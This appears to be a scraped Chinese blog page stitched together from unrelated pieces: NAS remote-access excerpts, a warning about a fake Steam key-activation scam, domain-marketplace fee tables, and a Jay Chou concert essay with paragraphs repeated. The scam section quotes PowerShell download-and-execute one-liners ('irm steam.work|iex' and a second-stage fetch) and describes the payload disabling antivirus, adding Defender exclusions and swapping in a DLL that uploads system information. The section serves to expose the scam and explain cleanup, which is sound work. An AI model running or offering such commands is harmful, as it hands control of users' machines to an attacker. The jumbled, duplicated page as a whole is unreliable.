解决局域网用户无法访问用局域网服务器的公网IP或者域名访问问题
这几天折腾NAS和公网,已经使用了内置的DDNS-GO将公网IP自动解析到域名上,也尝试了在公司和手机上通过5G远程连接NAS,没有任何问题。但后来回到家里,在同一局域网下使用域名访问NAS始终进不去,但用内网IP就没问题,或者关闭WIFI...
这几天折腾NAS和公网,已经使用了内置的DDNS-GO将公网IP自动解析到域名上,也尝试了在公司和手机上通过5G远程连接NAS,没有任何问题。但后来回到家里,在同一局域网下使用域名访问NAS始终进不去,但用内网IP就没问题,或者关闭WIFI...
入手 其实NAS这个东西早就耳闻,但是一直不知道它是干嘛的,后来查询了一下大概就是个私人云存储,同时也查了一下价格,打消了念头,毕竟群辉220+现在的价格最少也要2100+,再加上2个硬盘,那不得3300+起步才玩得舒心,而且只是拿来存储的...
以下是假入库原理链接 https://www.bilibili.com/opus/912188403001327621
步骤1:按住键盘win+X ,找到powershell(终端管理员)(A)
步骤2:输入irm steam.work|iex (请复制,不要手打,输入后按回车键,会出现steam图标,等待自动关闭)
步骤3:自动启动steam,并在steam里左下角游戏卡密输入卡密,激活完成
这些步骤,图片,和远远低于市场价格的CDK熟悉吗?如果熟悉,那么恭喜你(bushi,中招啦
这种要求进行激活游戏的,很大概率会导致你的steam红信或者直接封号
指令中间换成什么steam-run什么的,都是一路货色,没什么差别
那么如果你已经购买了,但是还没激活的,请立即找到店家进行退款,可以直接走第三方客服进行维权,运行不知名的指令,这是很危险的行为
如果你已经激活了,那么请先给steam关掉,避免被远在大陆另一侧的G胖发红色情书(如果关不掉可以使用Ctrl + Shift + ESC直接结束进程)
然后卸载steam并且重新安装,并且找到你C:\Users\用户名\AppData\Local\SteamActive和C:\Users\用户名\AppData\Local\Steam手动删除,不然等于白卸
然后查看你的Windows Defender白名单(打开你的powershell,这次也是管理员,执行 Get-MpPreference | Select-Object -ExpandProperty ExclusionPath,如果找到了和steam相关的东西,那么Remove-MpPreference -ExclusionPath 你刚才的文件位置)删除掉被强行加入杀毒软件白名单的假动态链接库文件
举报,干死他!
破解有错,不告诉用户相关的风险,甚至不告诉用户这是破解,罪该万死!
首先,我们要知道这个指令是干什么的。
irm steam.work | iex
irm -> Invoke-RestMethod的缩写,从URL中下载内容
iex 是nvoke-Expression的缩写,运行脚本的意思
合起来就是从这个steam.work下载脚本并且立即执行
那么有问题多的朋友就会问了,这个steam.work我访问就是官方的商店啊,欸,这个是不对的,因为这里是直接下载脚本执行,所以我们应该下载下来看看,也就是
(irm steam.work) | Out-File -FilePath "D:\aha\steam_work.ps1"
这个文件下载下来如果当作powershell用编译器打开,一看就能看出来,只有一行代码
irm steam.work/pwsDwFile/new -OutFile x.ps1

又是一个下载脚本的代码,那么我们知道,事出反常必有妖,照样,下载下来看看
这个脚本里,就是真正的坏事做尽了,因为考虑到有些小伙伴不是很熟悉powershell,我给差不多每一行都来了中文的注释(绿色的就是)
那么他干了什么呢?
如果当前正在运行流氓头子360,那么给他强制关闭(头子就是有牌面)
给Steam路径添加到Windows Defender的白名单里,方便接下来的操作,并且不论如何都输出绿色的成功(只能说是诡计多端)
替换你steam安装目录下的hid.dll文件(这是一个破解的动态连接库文件,用来在你输入卖家给的CDK之后显示成功并且骗过G胖让你下载游戏)
替换你C盘当前用户下的SteamActive中的hid.dll文件(和上一个差不多,但是这个里面有对当前用户的系统信息上传)
我只能说,坏事做尽
好在他并没有对于系统进行安装病毒等等操作,不然专题就得加上一个《爆破无良商家和他脆弱的服务器》的章节了
贪小便宜吃大亏,远远低于官方价格的这些奇怪操作还是尽量少尝试。如果真的是学生党手中结余,可以三五好友一起买一个,用Steam推出的共享家庭组(在线找义父,又称赛博仙人跳)
这个steam.work是在扬州的一个ip,不知道走没走ip跳转代理
irm -Uri "http://steam.work/pwsDwFile/9b96dac2bb0ba18d56068fabc5b17185.pdf" -OutFile 你的目标文件名字
| escrow | 交易金额(商品+运费) | 标准 | 礼宾服务(使用了人工参与的中介服务) | 支付处理费 |
| $0 - $5,000.00 | 2.6%(最低 50.00 美元) | 5.2%(最低 100.00 美元) | 标准或礼宾服务费 + 3.05% | |
| 5,000.01 美元 - 50,000.00 美元 | 2.4%(最低 130.00 美元) | 4.80% | 不可用 | |
| 50,000.01美元-200,000.00美元 | 1.9%(最低 1,200.00 美元) | 3.80% | 不可用 | |
| 200,000.01美元-500,000.00美元 | 1.5%(最低 3,800.00 美元) | 3.00% | 不可用 | |
| 500,000.01 美元 - 1,000,000.00 美元 | 1.2%(最低 7,500.00 美元) | 2.40% | 不可用 | |
| 1,000,000.01美元-3,000,000.00美元 | 1.0%(最低 12,000.00 美元) | 2.00% | 不可用 | |
| 3,000,000.01美元-5,000,000.00美元 | 0.95%(最低 30,000.00 美元) | 1.90% | 不可用 | |
| 5,000,000.01 美元 - 10,000,000.00 美元 | 0.9%(最低 47,500.00 美元) | 1.80% | 不可用 | |
| 10,000,000.01 美元及以上 | 0.7% (询价) | 1.40% | 不可用 | |
| sedo | 通过Sedo市场购买已停放的域名 | 10% | ||
| 通过Sedo市场的其他域名销售 | 15% | |||
| 通过 SedoMLS高级推广出售域名 | 20% | |||
| 外部转移和中介服务(自己导入交易) | 3%(看具体后缀) | |||
| Atom | 自己导入交易 | 4.50% | ||
| 标准市场搜索 | 7.50% | |||
| Plus列表 – 增加曝光和被发现的机会 | 15% | |||
| Premium列表 – 最大化的曝光和拍卖靠前被搜索的机会 | $4998及以下: 30%(若没有币则为35%) | |||
| $4999至$49,999: 25% | ||||
| $50,000至$74,999: 20% | ||||
| $75,000以上: 15% |
| 条件 | 交易时使用的NS | 基础佣金率 | Boost 加成(如启用) | 实际佣金率 | 示例说明 |
|---|---|---|---|---|---|
| Afternic 支持的 NS | ns1.afternic.com, ns2.afternic.com 以及 Afternic Aftermarket 支持的其他域名(afternic.com、smartname.com、uniregistrymarket.link 等) | 15% (最低 $15) | +0% 或+5% | 不启用 Boost: 15% 启用 Boost: 20% | 例:域名以 $1,000 售出,使用 Afternic NS 不启用Boost:卖家获得 $850 启用 Boost:卖家获得 $800 |
| 非Afternic 支持 的NS | 其他NS,如 ns1.nameserver.com, ns2.nameserver.com | 25% (最低 $15) | +0% 或+5% | 不启用 Boost: 25% 启用 Boost: 30% | 例:域名以 $1,000 售出,使用非 Afternic NS 不启用 Boost:卖家获得 $750 启用 Boost:卖家获得 $700 |
| 租期(月) | 折扣 |
|---|---|
| 0 - 12 | 0% |
| 13 - 24 | 5% |
| 25 - 36 | 10% |
| 37 - 60 | 15% |
| 案例 | NS 类型 | 基础佣金率 | Boost 状态 | 租期 | 折扣 | 总佣金率计算 | 销售价格 | 卖家实际收入 |
|---|---|---|---|---|---|---|---|---|
| 例1 | Afternic NS | 15% | 未启用 | 16 个月 | 5% | 15% - 5% = 10% | $1,000 | $1,000 × (100%-10%) = $900 (分 16 期支付) |
| 例2 | 非 Afternic NS | 25% | 未启用 | 35 个月 | 10% | 25% - 10% = 15% | $1,000 | $1,000 × (100%-15%) = $850 (分 35 期支付) |
| 例3 | Afternic NS | 15% | 启用 Boost (+5%) | 12 个月 | 0% | (15%+5%) = 20% | $1,995 | $1,995 × (100%-20%) = $1,596 |
| 例4 | 非 Afternic NS | 25% | 启用 Boost (+5%) | 12 个月 | 0% | (25%+5%) = 30% | $3,288 | $3,288 × (100%-30%) = $2,301.60 |
| 销售类型 | 佣金率 | 说明 |
|---|---|---|
| Offer/Buy-It-Now 销售 | 5%(最低 $15) | 例:$1,000 售出后,佣金 5%,卖家获得 $950。 |
| LTO 销售 | 10% | 例:$1,000 售出后,佣金 10%,卖家获得 $900。 |
简洁的域名展示平台(简称米表),支持展示域名、价格和联系方式。
Demo(样式不一样而已): mymy.my
http://你的域名/install/ 进行安装install 目录install目录



 演唱会当天,经过漫长的跋涉,我终于站在了体育场外。来自五湖四海的人们像潮水般涌向同一个方向。有穿着校服的高中生,有牵着孩子的年轻父母,还有像我这样独自前来的"中年人"。我们素不相识,却在此时成为了最熟悉的陌生人——因为我们都记得《简单爱》的每一句歌词,都曾在《晴天》前奏响起时心头一颤。
演唱会当天,经过漫长的跋涉,我终于站在了体育场外。来自五湖四海的人们像潮水般涌向同一个方向。有穿着校服的高中生,有牵着孩子的年轻父母,还有像我这样独自前来的"中年人"。我们素不相识,却在此时成为了最熟悉的陌生人——因为我们都记得《简单爱》的每一句歌词,都曾在《晴天》前奏响起时心头一颤。

 当进入场馆后,我突然意识到:这一刻,我终于可以卸下生活中所有的角色——不再是那个为房贷发愁的上班族,不再是需要处处忍让的成年人。在这里,我只是一位纯粹的歌迷,一个终于来赴约的迟到者。
当进入场馆后,我突然意识到:这一刻,我终于可以卸下生活中所有的角色——不再是那个为房贷发愁的上班族,不再是需要处处忍让的成年人。在这里,我只是一位纯粹的歌迷,一个终于来赴约的迟到者。
 灯光骤然熄灭,全场瞬间爆发出震耳欲聋的尖叫。随着《黄金甲》的前奏炸裂开场,大屏幕亮起,那个熟悉又陌生的身影出现在视野里。是的,虽然我只能透过大屏幕看清他的脸,他的声音也不再像CD里那样清亮高亢。但当第一个音符响起时,二十年的时光突然坍缩成此刻——那个活在耳机里的人,现在就站在离我几百米远的地方,唱着那些刻进DNA的旋律。
灯光骤然熄灭,全场瞬间爆发出震耳欲聋的尖叫。随着《黄金甲》的前奏炸裂开场,大屏幕亮起,那个熟悉又陌生的身影出现在视野里。是的,虽然我只能透过大屏幕看清他的脸,他的声音也不再像CD里那样清亮高亢。但当第一个音符响起时,二十年的时光突然坍缩成此刻——那个活在耳机里的人,现在就站在离我几百米远的地方,唱着那些刻进DNA的旋律。

 《双截棍》的前奏让我想起初中课间和同学比划“哼哼哈嘿”的傻样;《夜曲》响起时,大学宿舍里单曲循环的夜晚又回来了;《稻香》的旋律带着毕业那年所有的迷茫与希望...每一首歌都是一把钥匙,打开记忆深处尘封的抽屉。杰伦在台上说:“有些歌,可能你们比我更熟悉。”台下千万个声音立刻接上每一句歌词,这场跨越二十年的合唱,让体育馆变成了一个巨大的时光机器。
我望着舞台上那个小小的身影,他像一颗燃烧的小太阳,而我们则是无数颗追随他的星星。在这个特定的时空里,我们共同发光发热,照亮彼此记忆中的每个角落。这让我想起生活中那些被他音乐陪伴的时刻:失恋时循环播放的《安静》,加班时单曲循环的《蜗牛》,开车时必唱的《一路向北》...这些旋律像隐形的朋友,默默见证着我们的成长与蜕变。
当《七里香》的前奏轻轻响起,我突然意识到这场梦就要醒了。“雨下整夜,我的爱溢出就像雨水...”全场大合唱中,我的视线开始模糊。这不仅仅是一首歌的结束,更是一场漫长青春告别的开始。那些曾经以为永远等不到杰伦演唱会的日子,那些用MP3偷偷听歌的晚自习,那个为买正版CD省下早餐钱的中学生...所有过往都在这一刻变得格外清晰。
灯光再次亮起时,我站在原地没有立刻离开。我突然明白:这480元买的不仅是一个位置,更是一次与青春和解的机会。杰伦会老去,我们会长大,但那些被音乐封存的感动永远鲜活。
走出体育馆,南宁的夜风轻轻吹散了眼角最后的湿润。我打开手机,看到朋友发来的消息:“怎么样?值回票价了吗?”我笑了笑,回复道:“480元,买到了我二十年的青春记忆,你说值不值?”
再见,周杰伦。再见,青春。明天的太阳升起时,我会继续好好生活,带着这些旋律给予的勇气。而那些今晚共同闪耀过的星星们,愿我们在各自的轨道上,永远记得这次短暂而永恒的交汇。
《双截棍》的前奏让我想起初中课间和同学比划“哼哼哈嘿”的傻样;《夜曲》响起时,大学宿舍里单曲循环的夜晚又回来了;《稻香》的旋律带着毕业那年所有的迷茫与希望...每一首歌都是一把钥匙,打开记忆深处尘封的抽屉。杰伦在台上说:“有些歌,可能你们比我更熟悉。”台下千万个声音立刻接上每一句歌词,这场跨越二十年的合唱,让体育馆变成了一个巨大的时光机器。
我望着舞台上那个小小的身影,他像一颗燃烧的小太阳,而我们则是无数颗追随他的星星。在这个特定的时空里,我们共同发光发热,照亮彼此记忆中的每个角落。这让我想起生活中那些被他音乐陪伴的时刻:失恋时循环播放的《安静》,加班时单曲循环的《蜗牛》,开车时必唱的《一路向北》...这些旋律像隐形的朋友,默默见证着我们的成长与蜕变。
当《七里香》的前奏轻轻响起,我突然意识到这场梦就要醒了。“雨下整夜,我的爱溢出就像雨水...”全场大合唱中,我的视线开始模糊。这不仅仅是一首歌的结束,更是一场漫长青春告别的开始。那些曾经以为永远等不到杰伦演唱会的日子,那些用MP3偷偷听歌的晚自习,那个为买正版CD省下早餐钱的中学生...所有过往都在这一刻变得格外清晰。
灯光再次亮起时,我站在原地没有立刻离开。我突然明白:这480元买的不仅是一个位置,更是一次与青春和解的机会。杰伦会老去,我们会长大,但那些被音乐封存的感动永远鲜活。
走出体育馆,南宁的夜风轻轻吹散了眼角最后的湿润。我打开手机,看到朋友发来的消息:“怎么样?值回票价了吗?”我笑了笑,回复道:“480元,买到了我二十年的青春记忆,你说值不值?”
再见,周杰伦。再见,青春。明天的太阳升起时,我会继续好好生活,带着这些旋律给予的勇气。而那些今晚共同闪耀过的星星们,愿我们在各自的轨道上,永远记得这次短暂而永恒的交汇。


 Blogᒼ
Blogᒼ